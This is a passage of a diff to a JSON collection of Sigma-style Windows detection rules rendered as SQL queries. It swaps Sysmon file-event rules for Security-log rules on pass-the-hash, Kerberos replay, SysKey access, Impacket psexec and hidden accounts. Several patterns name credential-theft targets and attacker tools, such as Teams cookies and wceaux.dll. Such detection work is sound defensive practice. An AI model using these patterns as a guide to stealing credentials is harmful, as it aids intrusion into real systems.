OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" ], - "filename": "file_event_win_persistence_error_handler_cmd.yml" + "filename": "win_security_net_share_obj_susp_desktop_ini.yml" }, { - "title": "Creation In User Word Startup Folder", - "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", - "status": "experimental", - "description": "Detects the creation of an file in user Word Startup", - "author": "frack113", + "title": "Pass the Hash Activity 2", + "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "status": "stable", + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "author": "Dave 
Kennedy, Jeff Warren (method) / David Vassallo (rule)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.lateral_movement", + "attack.t1550.002" ], "falsepositives": [ - "Addition of legitimate plugins" + "Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" ], - "filename": "file_event_win_office_winword_startup.yml" + "filename": "win_security_pass_the_hash_2.yml" }, { - "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", - "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "title": "User Logoff Event", + "id": "0badd08f-c6a3-4630-90d3-6875cca440be", "status": "experimental", - "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "description": "Detects a user log-off activity. 
Could be used for example to correlate information during forensic investigations", "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.002" - ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4634', '4647'))" ], - "filename": "file_event_win_iphlpapi_dll_sideloading.yml" + "filename": "win_security_user_logoff.yml" }, { - "title": "Suspicious ADSI-Cache Usage By Unknown Tool", - "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", + "title": "Windows Pcap Drivers", + "id": "7b687634-ab20-11ea-bb37-0242ac130002", "status": "test", - "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "author": "Cian Heasley", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.discovery", + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
+ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_adsi_cache_usage.yml" + "filename": 
"win_security_pcap_drivers.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Login with WMI", + "id": "5af54681-df95-4c26-854f-2565e13cfab0", + "status": "stable", + "description": "Detection of logins performed with WMI", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Monitoring tools", + "Legitimate system administration" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND 
EventID = '4624' AND ProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_susp_wmi_login.yml" }, { - "title": "Office Macro File Download", - "id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", + "title": "Replay Attack Detected", + "id": "5a44727c-3b85-4713-8c44-4401d5499629", "status": "experimental", - "description": "Detects the creation of a new office macro files on the systems via an application (browser, mail client).", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", + "author": "frack113", "falsepositives": [ - "Legitimate macro files downloaded from the internet", - "Legitimate macro files sent as attachemnts via emails" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR Image LIKE '%\\\\HxOutlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND ((TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\') OR (TargetFilename LIKE '%.docm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dotm:Zone%' ESCAPE 
'\\' OR TargetFilename LIKE '%.xlsm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xltm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.potm:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.pptm:Zone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" ], - "filename": "file_event_win_office_macro_files_downloaded.yml" + "filename": "win_security_replay_attack_detected.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "SysKey Registry Keys Access", + "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", + "status": "test", + "description": "Detects handle requests and access operations to specific registry keys to calculate the SysKey", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", + 
"title": "User with Privileges Logon", + "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ], + "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_admin_logon.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", - "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell 
execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.credential_access", + "attack.t1003", + "attack.s0005" ], "falsepositives": [ - "System processes copied outside their default folders for testing 
purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.privilege_escalation" + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "TeamViewer 
Remote Session", - "id": "162ab1e4-6874-4564-853c-53ec3ab8be01", - "status": "test", - "description": "Detects the creation of log files during a TeamViewer remote session", + "title": "Account Tampering - Suspicious Failed Logon Reasons", + "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "status": "experimental", + "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate uses of TeamViewer in an organisation" + "User using a disabled account" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\TeamViewer\\\\RemotePrinting\\\\tvprint.db' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TeamViewer\\\\TVNetwork.log' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\TeamViewer%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Logfile.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" ], - "filename": "file_event_win_susp_teamviewer_remote_session.yml" + "filename": "win_security_susp_failed_logon_reasons.yml" }, { - "title": "Creation Of Non-Existent System DLL", - "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Detects the creation of system dlls that are not present on the system. 
Usually to achieve dll hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", + "attack.execution", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE 